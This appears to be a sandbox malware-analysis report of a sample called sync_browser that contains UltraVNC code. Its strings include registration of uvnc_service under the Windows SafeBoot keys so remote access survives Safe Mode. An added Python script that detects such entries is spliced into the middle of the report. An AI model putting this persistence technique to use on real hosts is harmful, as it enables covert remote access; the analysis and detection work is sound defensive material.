• Instruction ID: 37bcd6ba0010bff0f7c8e1e70f4b07107661f2b68a375a1089b7576c1687d74e
• Opcode Fuzzy Hash: faf61d6d44ca246d6e556e1dfbdb385b5274f0d62226512dde9a94f323da9ec3
• Instruction Fuzzy Hash: 33412D31619B95A2E64C9B20FE402EC73A8FB84754F504236D7AD83790DFB9A5B7C700
APIs
Strings
Memory Dump Source
• Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
• Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: LANMANNT$LANSECNT$ProductType$SERVERNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                    • API String ID: 3677997916-356703426
                                                                    • Opcode ID: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                    • Instruction ID: 1c0419d93453d0f5940d2bd226de855a46038422cf153055a41daba93fff1d10
                                                                    • Opcode Fuzzy Hash: 88216def6c21df696fe551fc804dfdd3315c8a7ded965229e51908db5a4eccae
                                                                    • Instruction Fuzzy Hash: E4419372A1864B81FB208B61E9403AE33A4FF94348F405133EA5DC6599EF3DD567CB10
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseOpenQueryValue
                                                                    • String ID: CurrentType$Multiprocessor Checked$Multiprocessor Free$SOFTWARE\Microsoft\Windows NT\CurrentVersion$Uniprocessor Checked$Uniprocessor Free
                                                                    • API String ID: 3677997916-1370392681
                                                                    • Opcode ID: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                    • Instruction ID: 61db771afce51918dd3c23dc5be883dc71548a43adbdbd6c2b50b8f29c3e7795
                                                                    • Opcode Fuzzy Hash: 127efd2f4bb2d730ad2ffcadb57483ca5e65c2607e8512af785212c1471c3a0c
                                                                    • Instruction Fuzzy Hash: 38314071A18A5B81FB208B61E8447AD7368FB85348F805133DA8DC65D9EF3DD12B8B40
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$BitmapCompatibleDeleteErrorLastObjectSection
                                                                    • String ID: vncdesktop.cpp : attempting to enable DIBsection blits$vncdesktop.cpp : enabled fast DIBsection blits OK$vncdesktop.cpp : enabled slow blits OK$vncdesktop.cpp : failed to build DIB section - reverting to slow blits$vncdesktop.cpp : failed to create memory bitmap(%d)
                                                                    • API String ID: 554953491-3667255696
                                                                    • Opcode ID: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                    • Instruction ID: 54938be1e9fc7bc07d59eaecc1eff9e2acc37edf09284cbe219249bfa7c0df3e
                                                                    • Opcode Fuzzy Hash: 2412a222e5f925d2ec09e0f324b69aa0f7fbd9fb7eb1a0c9a7fdb40c2cf1af0a
                                                                    • Instruction Fuzzy Hash: E5313835A18A9B85EB10DF60E8405ED3368FB84B58F844533DA4D87658DF3CE16BC350
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseCreateValue_errno_invalid_parameter_noinfo_snprintf
                                                                    • String ID: ?$Network$SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s$Service$uvnc_service
                                                                    • API String ID: 913464532-2910635102
                                                                    • Opcode ID: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                    • Instruction ID: 1a695fb856057e192b89869ea678cf76ee9877abb7ccb9b5b0f8e4e29ec7f21b
                                                                    • Opcode Fuzzy Hash: 1bf795a48dcafc41ba0ceb8bae0d18797e802051582379eab5386516ec84cd5c
                                                                    • Instruction Fuzzy Hash: 12214175A08A9681EB60DB10F85576EB764FBC5358F800136E68C83B68DF7DD12ACF44
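The strings in the record above (SYSTEM\CurrentControlSet\Control\SafeBoot\%s\%s formatted with Network, Service and uvnc_service, next to RegCreateKey/RegSetValue-style APIs) are the part of UltraVNC's winvnc that registers its service under the SafeBoot keys, so the VNC server is also started when Windows is booted into Safe Mode with Networking. That matters for response: booting a host into Safe Mode to strip persistence does not stop a service registered there. Only the Network subkey is visible in the strings; Windows' other SafeBoot subkey is Minimal, and the check below covers both. The following is an added example, not code from the Joe Sandbox report or from UltraVNC: a Python script that parses a `reg export` of the SafeBoot key and reports every service or driver entry that is not in a baseline. The sample export is constructed and the baseline allow-list is an abridged illustration; in practice it is taken from a clean reference build of the same Windows version.

```python
"""Flag SafeBoot service/driver registrations that are not in a known-good baseline.

Input is the text of:
    reg export HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot safeboot.reg
read with open(path, encoding="utf-16"), since reg.exe writes UTF-16 with a BOM.
"""
import re
from typing import Dict, List, Set, Tuple

SAFEBOOT_ROOT = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot"

# Constructed sample export (not taken from a real host): a few standard
# entries plus the two keys UltraVNC creates, named after the strings in the
# report (SafeBoot\%s\%s, "Network", "Service", "uvnc_service").
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
"AlternateShell"="cmd.exe"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventLog]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\uvnc_service]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Base]
@="Driver Group"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\EventLog]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation]
@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\uvnc_service]
@="Service"
"""

# Abridged allow-list (assumption for the example). A real baseline is the full
# SafeBoot\Minimal and SafeBoot\Network contents of a clean reference install.
BASELINE: Dict[str, Set[str]] = {
    "Minimal": {"Base", "vga.sys", "EventLog"},
    "Network": {"Base", "EventLog", "LanmanWorkstation"},
}

_KEY_RE = re.compile(r"\[(.+)\]")
_VALUE_RE = re.compile(r'(@|"(?:[^"\\]|\\.)*")=(.*)')


def _unescape(s: str) -> str:
    """Undo .reg string escaping (\\ -> \ and \" -> ")."""
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse a .reg export into {key_path: {value_name: data}}.

    '@' is the key's default value. Only REG_SZ data is unquoted; other
    types (dword:, hex:) are kept as their raw token, which is enough here.
    """
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Windows Registry Editor"):
            continue
        m = _KEY_RE.fullmatch(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = _VALUE_RE.fullmatch(line) if current is not None else None
        if not m:
            continue
        name = "@" if m.group(1) == "@" else _unescape(m.group(1)[1:-1])
        data = m.group(2)
        if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
            data = _unescape(data[1:-1])
        keys[current][name] = data
    return keys


def find_safeboot_anomalies(
    reg_text: str, baseline: Dict[str, Set[str]] = BASELINE
) -> List[Tuple[str, str, str]]:
    """Return (mode, entry, default_value) for each SafeBoot\<mode>\<entry> key
    missing from the baseline of that mode. Registry key names are
    case-insensitive, so the comparison is too."""
    findings: List[Tuple[str, str, str]] = []
    prefix = SAFEBOOT_ROOT.lower() + "\\"
    for key, values in parse_reg_export(reg_text).items():
        if not key.lower().startswith(prefix):
            continue
        parts = key[len(prefix):].split("\\")
        if len(parts) != 2:          # the root and the bare mode keys are not entries
            continue
        mode, entry = parts
        allowed = {e.lower() for e in baseline.get(mode, set())}
        if entry.lower() not in allowed:
            findings.append((mode, entry, values.get("@", "")))
    return findings


if __name__ == "__main__":
    for mode, entry, kind in find_safeboot_anomalies(SAMPLE_REG_EXPORT):
        print(f"SafeBoot\\{mode}\\{entry} ({kind or 'no default value'}) is not in the baseline")
```

On the constructed sample the script reports SafeBoot\Minimal\uvnc_service and SafeBoot\Network\uvnc_service, both with the default value Service, which is what a service (as opposed to a driver or a driver group) registered for Safe Mode looks like. The same parser works on an export taken from a suspect host offline, and an entry whose name is a VNC, RMM or other remote-access service is the one to pull the service binary path for next.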
                                                                    APIs
                                                                    Strings
                                                                    • vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed , xrefs: 00007FF6DC0F321D
                                                                    • vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked , xrefs: 00007FF6DC0F31DE
                                                                    • vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close , xrefs: 00007FF6DC0F319A
                                                                    • vncdesktopsink.cpp : initwindowthread already closed , xrefs: 00007FF6DC0F3246
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleThread$MessageObjectPostSingleTerminateWait
                                                                    • String ID: vncdesktopsink.cpp : initwindowthread already closed $vncdesktopsink.cpp : ~vncDesktop:: iniwindowthread proper closed $vncdesktopsink.cpp : ~vncDesktop::ERROR: messageloop blocked $vncdesktopsink.cpp : ~vncDesktop::Tell initwindowthread to close
                                                                    • API String ID: 803186428-2751095142
                                                                    • Opcode ID: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                    • Instruction ID: 62e452e67aa8b5e3117d25a48ea7068387d849391a160a3427862ff65fd9caaf
                                                                    • Opcode Fuzzy Hash: ff4a8dadbb3d1f80123651424f61364fee41c37e370f197b6d587ed49a2076d2
                                                                    • Instruction Fuzzy Hash: FB214D229249DA86F3109F25D8586ED236DFB88704F884533CA0E9A165CF3DA5A7C261
                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185A72
                                                                    • malloc.LIBCMT ref: 00007FF6DC185ADB
                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185B0F
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185B36
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185B7E
                                                                    • malloc.LIBCMT ref: 00007FF6DC185BDB
                                                                      • Part of subcall function 00007FF6DC178C34: _FF_MSGBANNER.LIBCMT ref: 00007FF6DC178C64
                                                                      • Part of subcall function 00007FF6DC178C34: HeapAlloc.KERNEL32(?,?,00000000,00007FF6DC18329C,?,?,?,00007FF6DC187749,?,?,?,00007FF6DC1877F3), ref: 00007FF6DC178C89
                                                                      • Part of subcall function 00007FF6DC178C34: _callnewh.LIBCMT ref: 00007FF6DC178CA2
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CAD
                                                                      • Part of subcall function 00007FF6DC178C34: _errno.LIBCMT ref: 00007FF6DC178CB8
                                                                    • LCMapStringW.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185C10
                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,00000000,?,?,00007FF6DC185D15), ref: 00007FF6DC185C50
                                                                    • free.LIBCMT ref: 00007FF6DC185C64
                                                                    • free.LIBCMT ref: 00007FF6DC185C75
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiStringWide$_errnofreemalloc$AllocHeap_callnewh
                                                                    • String ID:
                                                                    • API String ID: 1080698880-0
                                                                    • Opcode ID: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                    • Instruction ID: e657a854ca564dcfac7d7600f58ba73c833b2d9fb2e925d5e0cb86c4ab362fe3
                                                                    • Opcode Fuzzy Hash: b5a887be6137e653958006011188746c2f8056e99f6c4bc23332a32471009a2b
                                                                    • Instruction Fuzzy Hash: 6681D232A0C75A96FB648F259C8096D6699FF44BA4F444237DA2D83BD4DF3CE5128700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$DesktopLeave$CloseCountEnterInputOpenRevertSelfTickTimetime
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2523754900-3977938048
                                                                    • Opcode ID: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                    • Instruction ID: 90ef17ba9ecb45f090b875f8eb978c421d89452b62810a7664646928ce1d8643
                                                                    • Opcode Fuzzy Hash: f00f46bdec5dcfd195635017d4a5b0b55a3711d86be45cf4a2b3171601dbe6f0
                                                                    • Instruction Fuzzy Hash: F2B1E132A0869585FB50CB65C8587FE2BA9EB85B84F194137CA4CC77A5CF3EE462C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: inet_addr$connectgethostbynamehtonssocket
                                                                    • String ID: 0123456789.
                                                                    • API String ID: 478842821-2088042752
                                                                    • Opcode ID: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                    • Instruction ID: 1565083125b2ec84c8bd3c8f6bdc68fcf316f658089e280de9de69af37467020
                                                                    • Opcode Fuzzy Hash: 263abe01daf5a009ada5feb1aef2725500a51be732e0e04e7777c9ecb3499f38
                                                                    • Instruction Fuzzy Hash: 05418361A0876985EA209F22E94017D73A0FF88F95F044232ED9D87794EF3DE563C750
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Rect$ClassCombineCreateDeleteNameObjectWindowfree
                                                                    • String ID: ConsoleWindowClass$tty
                                                                    • API String ID: 490048385-1921057836
                                                                    • Opcode ID: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                    • Instruction ID: 01ef7c6b08d69753f93c82c61c3a774a8bc7ec21b1cfd776e6a0083de9212bcc
                                                                    • Opcode Fuzzy Hash: 298372f63dd054519ce3cc4dd935d2ab84d827bdd727a36e9ad3e0d359236f91
                                                                    • Instruction Fuzzy Hash: 5D4162367086898ADB24CB26E49466DB7A5FB88B84F444036DF8E83B54DF3DE556CB00
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CursorEnterLeave$Rect
                                                                    • String ID: ^
                                                                    • API String ID: 2550375211-1590793086
                                                                    • Opcode ID: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                    • Instruction ID: 294041090ec161d2069f3d19e6b2f0d904a829c9f48e75408587e8f597c63247
                                                                    • Opcode Fuzzy Hash: d878f0e7e6db227b12d9c6317699a075fbf28d892376275b9f235674c6b9a16b
                                                                    • Instruction Fuzzy Hash: 5F41EC366086458BD728CF19E59436DB7A1F788B94F104236DB6D83B54CF39E466CF00
                                                                    APIs
                                                                    Strings
